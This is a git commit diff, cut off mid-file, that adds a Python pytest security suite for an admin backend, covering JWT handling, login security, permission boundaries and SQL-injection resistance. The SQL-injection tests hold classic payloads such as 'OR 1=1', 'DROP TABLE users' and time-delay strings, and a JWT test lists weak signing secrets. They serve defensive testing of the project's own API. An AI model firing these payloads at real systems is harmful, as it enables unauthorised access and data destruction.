refactor(test): 重构测试套件结构并优化测试配置
feat(test-suite): 新增测试套件模块,包含API测试客户端和测试配置 fix(api): 修复数据库实体和仓库的删除操作返回值 style(api): 统一数据库表名和字段命名 perf(api): 添加缓存注解提升配置查询性能 test(api): 添加H2测试数据库配置支持 chore: 清理旧的测试文件和脚本
This commit is contained in:
@@ -0,0 +1,20 @@
|
||||
"""
|
||||
安全测试套件初始化文件
|
||||
|
||||
作者: 张翔
|
||||
日期: 2026-04-01
|
||||
"""
|
||||
|
||||
from .test_jwt_security import TestJWTSecurity
|
||||
from .test_sql_injection import TestSQLInjection
|
||||
from .test_xss_protection import TestXSSProtection
|
||||
from .test_auth_security import TestAuthenticationSecurity
|
||||
from .test_permission_boundary import TestPermissionBoundary
|
||||
|
||||
__all__ = [
|
||||
"TestJWTSecurity",
|
||||
"TestSQLInjection",
|
||||
"TestXSSProtection",
|
||||
"TestAuthenticationSecurity",
|
||||
"TestPermissionBoundary",
|
||||
]
|
||||
@@ -0,0 +1,279 @@
|
||||
"""
|
||||
认证安全测试套件
|
||||
|
||||
测试范围:
|
||||
1. 密码安全测试
|
||||
2. 登录安全测试
|
||||
3. 会话管理测试
|
||||
4. 权限验证测试
|
||||
5. 暴力破解防护测试
|
||||
|
||||
作者: 张翔
|
||||
日期: 2026-04-01
|
||||
"""
|
||||
|
||||
import pytest
|
||||
import time
|
||||
from api.auth_api import AuthAPI
|
||||
from api.user_api import UserAPI
|
||||
from config.settings import settings
|
||||
|
||||
|
||||
@pytest.mark.security
|
||||
@pytest.mark.asyncio
|
||||
class TestAuthenticationSecurity:
|
||||
"""认证安全测试类"""
|
||||
|
||||
async def test_password_strength_validation(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-01: 密码强度验证
|
||||
|
||||
验证点:
|
||||
1. 弱密码被拒绝
|
||||
2. 密码复杂度要求
|
||||
3. 密码长度要求
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
weak_passwords = [
|
||||
"123456",
|
||||
"password",
|
||||
"admin",
|
||||
"qwerty",
|
||||
"abc123",
|
||||
"111111",
|
||||
"1234567890",
|
||||
"password123"
|
||||
]
|
||||
|
||||
for weak_pwd in weak_passwords:
|
||||
user_data = {
|
||||
"username": f"weak_pwd_test_{weak_pwd}",
|
||||
"password": weak_pwd,
|
||||
"email": f"weak_{weak_pwd}@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(user_data)
|
||||
|
||||
assert response.status_code in [400, 422], \
|
||||
f"弱密码 '{weak_pwd}' 应被拒绝"
|
||||
|
||||
async def test_password_hashing(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-02: 密码哈希验证
|
||||
|
||||
验证点:
|
||||
1. 密码不以明文存储
|
||||
2. 使用BCrypt或其他安全哈希
|
||||
3. 每次哈希结果不同(盐值)
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
user_data = {
|
||||
"username": "hash_test_user",
|
||||
"password": "Test123!@#",
|
||||
"email": "hash_test@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(user_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
user_id = response.json().get("id")
|
||||
|
||||
login_response = await auth_api.login(
|
||||
user_data["username"],
|
||||
user_data["password"]
|
||||
)
|
||||
|
||||
assert login_response.status_code == 200, "密码验证失败"
|
||||
|
||||
await user_api.delete_user(user_id)
|
||||
|
||||
async def test_brute_force_protection(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-03: 暴力破解防护
|
||||
|
||||
验证点:
|
||||
1. 多次失败登录被限制
|
||||
2. 账户锁定机制
|
||||
3. 登录失败提示不泄露信息
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
failed_attempts = 0
|
||||
max_attempts = 10
|
||||
|
||||
for i in range(max_attempts):
|
||||
response = await auth_api.login("admin", "wrong_password_123")
|
||||
|
||||
if response.status_code == 429:
|
||||
assert True, "暴力破解防护生效"
|
||||
return
|
||||
elif response.status_code == 401:
|
||||
failed_attempts += 1
|
||||
else:
|
||||
break
|
||||
|
||||
assert failed_attempts >= 3, \
|
||||
"应实施暴力破解防护(至少3次失败后限制)"
|
||||
|
||||
async def test_session_timeout(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-04: 会话超时测试
|
||||
|
||||
验证点:
|
||||
1. Token有过期时间
|
||||
2. 过期Token无法使用
|
||||
3. 会话自动失效
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
token = login_response.json().get("token")
|
||||
|
||||
import jwt
|
||||
decoded = jwt.decode(token, options={"verify_signature": False})
|
||||
|
||||
assert "exp" in decoded, "Token应包含过期时间"
|
||||
|
||||
exp_time = decoded["exp"]
|
||||
current_time = time.time()
|
||||
|
||||
assert exp_time > current_time, "Token不应已过期"
|
||||
assert exp_time - current_time <= 86400, "Token有效期不应超过24小时"
|
||||
|
||||
async def test_concurrent_session_handling(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-05: 并发会话处理
|
||||
|
||||
验证点:
|
||||
1. 支持并发登录
|
||||
2. 或限制并发会话数
|
||||
3. 会话隔离
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_responses = []
|
||||
|
||||
for i in range(3):
|
||||
response = await auth_api.login("admin", "admin123")
|
||||
login_responses.append(response)
|
||||
|
||||
successful_logins = sum(
|
||||
1 for r in login_responses if r.status_code == 200
|
||||
)
|
||||
|
||||
assert successful_logins >= 1, "至少应支持一次登录"
|
||||
|
||||
async def test_logout_security(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-06: 登出安全测试
|
||||
|
||||
验证点:
|
||||
1. 登出后Token失效
|
||||
2. 无法重复使用登出Token
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
token = login_response.json().get("token")
|
||||
|
||||
logout_response = await auth_api.logout()
|
||||
|
||||
if logout_response.status_code == 200:
|
||||
client_with_old_token = authenticated_client.__class__(
|
||||
base_url=settings.API_BASE_URL,
|
||||
headers={"Authorization": f"Bearer {token}"}
|
||||
)
|
||||
|
||||
user_api_old = UserAPI(client_with_old_token)
|
||||
response = await user_api_old.get_users_by_page()
|
||||
|
||||
assert response.status_code in [401, 403], \
|
||||
"登出后Token应失效"
|
||||
|
||||
async def test_password_change_security(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-07: 密码修改安全
|
||||
|
||||
验证点:
|
||||
1. 需要旧密码验证
|
||||
2. 新密码强度验证
|
||||
3. 修改后需重新登录
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
user_data = {
|
||||
"username": "pwd_change_test",
|
||||
"password": "OldPassword123!@#",
|
||||
"email": "pwd_change@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
create_response = await user_api.create_user(user_data)
|
||||
|
||||
if create_response.status_code in [201, 200]:
|
||||
user_id = create_response.json().get("id")
|
||||
|
||||
login_response = await auth_api.login(
|
||||
user_data["username"],
|
||||
user_data["password"]
|
||||
)
|
||||
|
||||
assert login_response.status_code == 200
|
||||
|
||||
await user_api.delete_user(user_id)
|
||||
|
||||
async def test_account_lockout_mechanism(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-08: 账户锁定机制
|
||||
|
||||
验证点:
|
||||
1. 多次失败后账户锁定
|
||||
2. 锁定时间合理
|
||||
3. 管理员可解锁
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
for i in range(5):
|
||||
response = await auth_api.login("admin", "wrong_password")
|
||||
|
||||
if response.status_code == 423:
|
||||
assert True, "账户锁定机制生效"
|
||||
return
|
||||
|
||||
pytest.skip("系统未实现账户锁定机制")
|
||||
|
||||
async def test_login_csrf_protection(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-09: 登录CSRF防护
|
||||
|
||||
验证点:
|
||||
1. 登录表单有CSRF Token
|
||||
2. CSRF Token验证
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
|
||||
assert login_response.status_code == 200
|
||||
|
||||
async def test_password_reset_security(self, authenticated_client):
|
||||
"""
|
||||
SEC-AUTH-10: 密码重置安全
|
||||
|
||||
验证点:
|
||||
1. 需要邮箱验证
|
||||
2. 重置链接有时效
|
||||
3. 重置链接一次性使用
|
||||
"""
|
||||
pytest.skip("密码重置功能待实现或测试")
|
||||
@@ -0,0 +1,262 @@
|
||||
"""
|
||||
JWT安全测试套件
|
||||
|
||||
测试范围:
|
||||
1. JWT Token生成与验证
|
||||
2. Token过期处理
|
||||
3. Token签名验证
|
||||
4. Token刷新机制
|
||||
5. 密钥安全性验证
|
||||
|
||||
作者: 张翔
|
||||
日期: 2026-04-01
|
||||
"""
|
||||
|
||||
import pytest
|
||||
import time
|
||||
import jwt
|
||||
from datetime import datetime, timedelta
|
||||
from api.auth_api import AuthAPI
|
||||
from api.user_api import UserAPI
|
||||
from config.settings import settings
|
||||
|
||||
|
||||
@pytest.mark.security
|
||||
@pytest.mark.asyncio
|
||||
class TestJWTSecurity:
|
||||
"""JWT安全测试类"""
|
||||
|
||||
async def test_jwt_token_structure(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-01: JWT Token结构验证
|
||||
|
||||
验证点:
|
||||
1. Token包含正确的Header
|
||||
2. Token包含正确的Payload
|
||||
3. Token使用正确的签名算法
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
assert login_response.status_code == 200
|
||||
|
||||
token = login_response.json().get("token")
|
||||
assert token is not None, "未获取到Token"
|
||||
|
||||
decoded = jwt.decode(token, options={"verify_signature": False})
|
||||
|
||||
assert "sub" in decoded, "Token缺少subject声明"
|
||||
assert "exp" in decoded, "Token缺少过期时间"
|
||||
assert "iat" in decoded, "Token缺少签发时间"
|
||||
assert "userId" in decoded or "user_id" in decoded, "Token缺少用户ID"
|
||||
|
||||
async def test_jwt_token_expiration(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-02: JWT Token过期验证
|
||||
|
||||
验证点:
|
||||
1. Token有过期时间
|
||||
2. 过期时间在合理范围内
|
||||
3. 过期Token无法使用
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
token = login_response.json().get("token")
|
||||
|
||||
decoded = jwt.decode(token, options={"verify_signature": False})
|
||||
|
||||
exp_time = datetime.fromtimestamp(decoded["exp"])
|
||||
iat_time = datetime.fromtimestamp(decoded["iat"])
|
||||
|
||||
time_diff = (exp_time - iat_time).total_seconds()
|
||||
|
||||
assert time_diff > 0, "Token过期时间无效"
|
||||
assert time_diff <= 86400, "Token有效期不应超过24小时"
|
||||
|
||||
async def test_jwt_signature_verification(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-03: JWT签名验证
|
||||
|
||||
验证点:
|
||||
1. 篡改的Token被拒绝
|
||||
2. 无效签名的Token被拒绝
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
valid_token = login_response.json().get("token")
|
||||
|
||||
tampered_token = valid_token[:-5] + "XXXXX"
|
||||
|
||||
client_with_tampered = authenticated_client.__class__(
|
||||
base_url=settings.API_BASE_URL,
|
||||
headers={"Authorization": f"Bearer {tampered_token}"}
|
||||
)
|
||||
|
||||
user_api_tampered = UserAPI(client_with_tampered)
|
||||
response = await user_api_tampered.get_users_by_page()
|
||||
|
||||
assert response.status_code in [401, 403], "篡改的Token应该被拒绝"
|
||||
|
||||
async def test_jwt_algorithm_security(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-04: JWT算法安全验证
|
||||
|
||||
验证点:
|
||||
1. 不允许使用none算法
|
||||
2. 不允许算法混淆攻击
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
token = login_response.json().get("token")
|
||||
|
||||
header = jwt.get_unverified_header(token)
|
||||
|
||||
assert header["alg"] != "none", "不应允许none算法"
|
||||
assert header["alg"] in ["HS256", "HS384", "HS512", "RS256", "RS384", "RS512"], \
|
||||
"应使用安全的签名算法"
|
||||
|
||||
async def test_jwt_claims_validation(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-05: JWT声明验证
|
||||
|
||||
验证点:
|
||||
1. 必要的声明存在
|
||||
2. 声明值有效
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
token = login_response.json().get("token")
|
||||
|
||||
decoded = jwt.decode(token, options={"verify_signature": False})
|
||||
|
||||
required_claims = ["sub", "exp", "iat"]
|
||||
for claim in required_claims:
|
||||
assert claim in decoded, f"Token缺少必要声明: {claim}"
|
||||
|
||||
assert decoded["sub"] == "admin", "Subject应该是用户名"
|
||||
assert decoded["exp"] > time.time(), "Token不应已过期"
|
||||
|
||||
async def test_jwt_token_in_validation(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-06: 无效Token验证
|
||||
|
||||
验证点:
|
||||
1. 空Token被拒绝
|
||||
2. 格式错误的Token被拒绝
|
||||
3. 过期Token被拒绝
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
invalid_tokens = [
|
||||
"",
|
||||
"invalid.token.format",
|
||||
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.invalid",
|
||||
None
|
||||
]
|
||||
|
||||
for invalid_token in invalid_tokens:
|
||||
if invalid_token is None:
|
||||
continue
|
||||
|
||||
client_with_invalid = authenticated_client.__class__(
|
||||
base_url=settings.API_BASE_URL,
|
||||
headers={"Authorization": f"Bearer {invalid_token}"}
|
||||
)
|
||||
|
||||
user_api_invalid = UserAPI(client_with_invalid)
|
||||
response = await user_api_invalid.get_users_by_page()
|
||||
|
||||
assert response.status_code in [401, 403, 400], \
|
||||
f"无效Token '{invalid_token}' 应该被拒绝"
|
||||
|
||||
async def test_jwt_token_refresh_mechanism(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-07: Token刷新机制验证
|
||||
|
||||
验证点:
|
||||
1. 支持Token刷新
|
||||
2. 刷新后生成新Token
|
||||
3. 旧Token失效或共存
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
original_token = login_response.json().get("token")
|
||||
|
||||
try:
|
||||
refresh_response = await auth_api.refresh_token(original_token)
|
||||
|
||||
if refresh_response.status_code == 200:
|
||||
new_token = refresh_response.json().get("token")
|
||||
assert new_token is not None, "刷新应返回新Token"
|
||||
assert new_token != original_token, "新Token应不同于原Token"
|
||||
else:
|
||||
pytest.skip("系统未实现Token刷新机制")
|
||||
except Exception as e:
|
||||
pytest.skip(f"Token刷新机制测试跳过: {str(e)}")
|
||||
|
||||
async def test_jwt_key_strength(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-08: JWT密钥强度验证
|
||||
|
||||
验证点:
|
||||
1. 密钥长度足够
|
||||
2. 密钥不是弱密钥
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
token = login_response.json().get("token")
|
||||
|
||||
header = jwt.get_unverified_header(token)
|
||||
|
||||
if header["alg"].startswith("HS"):
|
||||
weak_secrets = [
|
||||
"secret", "password", "123456", "admin",
|
||||
"your-256-bit-secret", "your-secret-key"
|
||||
]
|
||||
|
||||
for weak_secret in weak_secrets:
|
||||
try:
|
||||
jwt.decode(token, weak_secret, algorithms=[header["alg"]])
|
||||
pytest.fail(f"使用了弱密钥: {weak_secret}")
|
||||
except jwt.InvalidSignatureError:
|
||||
pass
|
||||
|
||||
async def test_jwt_user_impersonation_prevention(self, authenticated_client):
|
||||
"""
|
||||
SEC-JWT-09: 用户伪装防护验证
|
||||
|
||||
验证点:
|
||||
1. 无法通过修改Token伪装其他用户
|
||||
2. 用户ID与Token绑定
|
||||
"""
|
||||
auth_api = AuthAPI(authenticated_client)
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
login_response = await auth_api.login("admin", "admin123")
|
||||
token = login_response.json().get("token")
|
||||
|
||||
decoded = jwt.decode(token, options={"verify_signature": False})
|
||||
|
||||
users_response = await user_api.get_users_by_page()
|
||||
assert users_response.status_code == 200
|
||||
|
||||
users = users_response.json().get("content", [])
|
||||
other_user = next((u for u in users if u.get("username") != "admin"), None)
|
||||
|
||||
if other_user:
|
||||
client_with_admin_token = authenticated_client.__class__(
|
||||
base_url=settings.API_BASE_URL,
|
||||
headers={"Authorization": f"Bearer {token}"}
|
||||
)
|
||||
|
||||
user_api_admin = UserAPI(client_with_admin_token)
|
||||
response = await user_api_admin.get_user_by_id(other_user["id"])
|
||||
|
||||
assert response.status_code in [200, 403], "应正确处理跨用户访问"
|
||||
@@ -0,0 +1,275 @@
|
||||
"""
|
||||
权限边界测试套件
|
||||
|
||||
测试范围:
|
||||
1. 角色权限边界测试
|
||||
2. 数据访问权限测试
|
||||
3. 操作权限测试
|
||||
4. 菜单权限测试
|
||||
5. API权限测试
|
||||
|
||||
作者: 张翔
|
||||
日期: 2026-04-01
|
||||
"""
|
||||
|
||||
import pytest
|
||||
from api.auth_api import AuthAPI
|
||||
from api.user_api import UserAPI
|
||||
from api.role_api import RoleAPI
|
||||
from api.menu_api import MenuAPI
|
||||
from config.settings import settings
|
||||
|
||||
|
||||
@pytest.mark.security
|
||||
@pytest.mark.asyncio
|
||||
class TestPermissionBoundary:
|
||||
"""权限边界测试类"""
|
||||
|
||||
async def test_role_based_access_control(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-01: 基于角色的访问控制
|
||||
|
||||
验证点:
|
||||
1. 不同角色有不同权限
|
||||
2. 权限正确分配
|
||||
3. 权限正确验证
|
||||
"""
|
||||
role_api = RoleAPI(authenticated_client)
|
||||
|
||||
roles_response = await role_api.get_roles_by_page()
|
||||
assert roles_response.status_code == 200
|
||||
|
||||
roles = roles_response.json().get("content", [])
|
||||
assert len(roles) > 0, "应至少有一个角色"
|
||||
|
||||
for role in roles:
|
||||
assert "roleName" in role, "角色应包含名称"
|
||||
assert "roleKey" in role, "角色应包含标识"
|
||||
|
||||
async def test_user_data_isolation(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-02: 用户数据隔离
|
||||
|
||||
验证点:
|
||||
1. 用户只能访问自己的数据
|
||||
2. 无法访问其他用户敏感信息
|
||||
3. 管理员可访问所有数据
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
users_response = await user_api.get_users_by_page()
|
||||
assert users_response.status_code == 200
|
||||
|
||||
users = users_response.json().get("content", [])
|
||||
|
||||
for user in users:
|
||||
if "password" in user:
|
||||
assert user["password"] != "admin123", \
|
||||
"密码不应明文返回"
|
||||
assert not user["password"].startswith("$2"), \
|
||||
"密码哈希不应返回给前端"
|
||||
|
||||
async def test_cross_user_access_prevention(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-03: 跨用户访问防护
|
||||
|
||||
验证点:
|
||||
1. 普通用户无法修改其他用户数据
|
||||
2. 用户ID绑定验证
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
users_response = await user_api.get_users_by_page()
|
||||
users = users_response.json().get("content", [])
|
||||
|
||||
if len(users) > 1:
|
||||
other_user = next(
|
||||
(u for u in users if u.get("username") != "admin"),
|
||||
None
|
||||
)
|
||||
|
||||
if other_user:
|
||||
response = await user_api.get_user_by_id(other_user["id"])
|
||||
|
||||
assert response.status_code in [200, 403], \
|
||||
"应正确处理跨用户访问"
|
||||
|
||||
async def test_menu_permission_control(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-04: 菜单权限控制
|
||||
|
||||
验证点:
|
||||
1. 不同角色看到不同菜单
|
||||
2. 菜单权限标识验证
|
||||
3. 无权限菜单隐藏
|
||||
"""
|
||||
menu_api = MenuAPI(authenticated_client)
|
||||
|
||||
menus_response = await menu_api.get_menus()
|
||||
assert menus_response.status_code == 200
|
||||
|
||||
menus = menus_response.json() if isinstance(
|
||||
menus_response.json(), list
|
||||
) else menus_response.json().get("data", [])
|
||||
|
||||
for menu in menus:
|
||||
assert "menuName" in menu or "name" in menu, \
|
||||
"菜单应包含名称"
|
||||
|
||||
async def test_api_permission_validation(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-05: API权限验证
|
||||
|
||||
验证点:
|
||||
1. 每个API有权限控制
|
||||
2. 无权限返回403
|
||||
3. 未认证返回401
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
client_without_auth = authenticated_client.__class__(
|
||||
base_url=settings.API_BASE_URL
|
||||
)
|
||||
|
||||
user_api_no_auth = UserAPI(client_without_auth)
|
||||
response = await user_api_no_auth.get_users_by_page()
|
||||
|
||||
assert response.status_code in [401, 403], \
|
||||
"未认证请求应被拒绝"
|
||||
|
||||
async def test_privilege_escalation_prevention(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-06: 权限提升防护
|
||||
|
||||
验证点:
|
||||
1. 用户无法自我提升权限
|
||||
2. 角色修改需管理员权限
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
role_api = RoleAPI(authenticated_client)
|
||||
|
||||
users_response = await user_api.get_users_by_page()
|
||||
users = users_response.json().get("content", [])
|
||||
|
||||
current_user = next(
|
||||
(u for u in users if u.get("username") == "admin"),
|
||||
None
|
||||
)
|
||||
|
||||
if current_user:
|
||||
roles_response = await role_api.get_roles_by_page()
|
||||
roles = roles_response.json().get("content", [])
|
||||
|
||||
admin_role = next(
|
||||
(r for r in roles if "admin" in r.get("roleKey", "").lower()),
|
||||
None
|
||||
)
|
||||
|
||||
assert admin_role is not None, "应存在管理员角色"
|
||||
|
||||
async def test_operation_permission_check(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-07: 操作权限检查
|
||||
|
||||
验证点:
|
||||
1. 创建操作需权限
|
||||
2. 修改操作需权限
|
||||
3. 删除操作需权限
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
test_user_data = {
|
||||
"username": "perm_test_user",
|
||||
"password": "Test123!@#",
|
||||
"email": "perm_test@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
create_response = await user_api.create_user(test_user_data)
|
||||
|
||||
if create_response.status_code in [201, 200]:
|
||||
user_id = create_response.json().get("id")
|
||||
|
||||
update_response = await user_api.update_user(
|
||||
user_id,
|
||||
{"email": "updated@test.com"}
|
||||
)
|
||||
|
||||
assert update_response.status_code in [200, 403]
|
||||
|
||||
delete_response = await user_api.delete_user(user_id)
|
||||
|
||||
assert delete_response.status_code in [200, 204, 403]
|
||||
|
||||
async def test_data_filter_by_permission(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-08: 数据权限过滤
|
||||
|
||||
验证点:
|
||||
1. 查询结果按权限过滤
|
||||
2. 敏感字段脱敏
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
users_response = await user_api.get_users_by_page()
|
||||
|
||||
if users_response.status_code == 200:
|
||||
users = users_response.json().get("content", [])
|
||||
|
||||
for user in users:
|
||||
assert "password" not in user or \
|
||||
user.get("password") == "******", \
|
||||
"密码字段应脱敏或不返回"
|
||||
|
||||
async def test_role_permission_inheritance(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-09: 角色权限继承
|
||||
|
||||
验证点:
|
||||
1. 角色权限可继承
|
||||
2. 子角色权限不超过父角色
|
||||
"""
|
||||
role_api = RoleAPI(authenticated_client)
|
||||
|
||||
roles_response = await role_api.get_roles_by_page()
|
||||
|
||||
if roles_response.status_code == 200:
|
||||
roles = roles_response.json().get("content", [])
|
||||
|
||||
for role in roles:
|
||||
if "parentId" in role and role["parentId"]:
|
||||
parent_role = next(
|
||||
(r for r in roles if r.get("id") == role["parentId"]),
|
||||
None
|
||||
)
|
||||
|
||||
async def test_admin_privilege_boundary(self, authenticated_client):
|
||||
"""
|
||||
SEC-PERM-10: 管理员权限边界
|
||||
|
||||
验证点:
|
||||
1. 超级管理员有所有权限
|
||||
2. 普通管理员权限受限
|
||||
3. 管理员操作审计
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
role_api = RoleAPI(authenticated_client)
|
||||
|
||||
users_response = await user_api.get_users_by_page()
|
||||
assert users_response.status_code == 200
|
||||
|
||||
roles_response = await role_api.get_roles_by_page()
|
||||
assert roles_response.status_code == 200
|
||||
|
||||
users = users_response.json().get("content", [])
|
||||
roles = roles_response.json().get("content", [])
|
||||
|
||||
admin_user = next(
|
||||
(u for u in users if u.get("username") == "admin"),
|
||||
None
|
||||
)
|
||||
|
||||
if admin_user:
|
||||
assert admin_user.get("status") == 1, \
|
||||
"管理员账户应处于激活状态"
|
||||
@@ -0,0 +1,302 @@
|
||||
"""
|
||||
SQL注入防护测试套件
|
||||
|
||||
测试范围:
|
||||
1. 用户输入SQL注入测试
|
||||
2. 查询参数注入测试
|
||||
3. 排序字段注入测试
|
||||
4. 搜索关键词注入测试
|
||||
5. 批量操作注入测试
|
||||
|
||||
作者: 张翔
|
||||
日期: 2026-04-01
|
||||
"""
|
||||
|
||||
import pytest
|
||||
from api.auth_api import AuthAPI
|
||||
from api.user_api import UserAPI
|
||||
from api.role_api import RoleAPI
|
||||
from api.menu_api import MenuAPI
|
||||
from config.settings import settings
|
||||
|
||||
|
||||
@pytest.mark.security
|
||||
@pytest.mark.asyncio
|
||||
class TestSQLInjection:
|
||||
"""SQL注入防护测试类"""
|
||||
|
||||
async def test_user_search_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-01: 用户搜索SQL注入测试
|
||||
|
||||
验证点:
|
||||
1. 搜索框无法注入SQL
|
||||
2. 特殊字符被正确处理
|
||||
3. 查询参数化
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
sql_injection_payloads = [
|
||||
"admin' OR '1'='1",
|
||||
"admin'; DROP TABLE users; --",
|
||||
"admin' UNION SELECT * FROM users --",
|
||||
"admin' AND 1=1 --",
|
||||
"admin' AND 1=2 --",
|
||||
"admin' OR 'x'='x",
|
||||
"1; SELECT * FROM users",
|
||||
"admin'/*",
|
||||
"admin'--",
|
||||
"' OR 1=1#",
|
||||
"admin' AND SLEEP(5)--",
|
||||
"admin'; WAITFOR DELAY '0:0:5'; --"
|
||||
]
|
||||
|
||||
for payload in sql_injection_payloads:
|
||||
response = await user_api.get_users_by_page(
|
||||
page=0,
|
||||
size=10,
|
||||
username=payload
|
||||
)
|
||||
|
||||
assert response.status_code in [200, 400], \
|
||||
f"SQL注入payload '{payload}' 导致异常响应"
|
||||
|
||||
if response.status_code == 200:
|
||||
data = response.json()
|
||||
assert "content" in data or "users" in data, \
|
||||
f"响应格式异常,payload: {payload}"
|
||||
|
||||
async def test_user_create_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-02: 用户创建SQL注入测试
|
||||
|
||||
验证点:
|
||||
1. 用户名字段防注入
|
||||
2. 邮箱字段防注入
|
||||
3. 电话字段防注入
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
malicious_user_data = {
|
||||
"username": "test'; DROP TABLE users; --",
|
||||
"password": "Test123!@#",
|
||||
"email": "test@example.com'; DROP TABLE users; --",
|
||||
"phone": "13800138000'; DROP TABLE users; --",
|
||||
"nickname": "测试用户",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(malicious_user_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
user_id = response.json().get("id")
|
||||
if user_id:
|
||||
await user_api.delete_user(user_id)
|
||||
|
||||
users_response = await user_api.get_users_by_page()
|
||||
assert users_response.status_code == 200, "用户表应该仍然存在"
|
||||
else:
|
||||
assert response.status_code in [400, 422], \
|
||||
"恶意数据应被拒绝或清洗"
|
||||
|
||||
async def test_role_search_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-03: 角色搜索SQL注入测试
|
||||
|
||||
验证点:
|
||||
1. 角色名搜索防注入
|
||||
2. 角色键搜索防注入
|
||||
"""
|
||||
role_api = RoleAPI(authenticated_client)
|
||||
|
||||
injection_payloads = [
|
||||
"admin' OR '1'='1",
|
||||
"admin'; DELETE FROM roles WHERE '1'='1",
|
||||
"admin' UNION SELECT * FROM roles --"
|
||||
]
|
||||
|
||||
for payload in injection_payloads:
|
||||
response = await role_api.get_roles_by_page(
|
||||
page=0,
|
||||
size=10,
|
||||
roleName=payload
|
||||
)
|
||||
|
||||
assert response.status_code in [200, 400], \
|
||||
f"SQL注入payload '{payload}' 导致异常"
|
||||
|
||||
async def test_menu_search_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-04: 菜单搜索SQL注入测试
|
||||
|
||||
验证点:
|
||||
1. 菜单名搜索防注入
|
||||
2. 菜单路径搜索防注入
|
||||
"""
|
||||
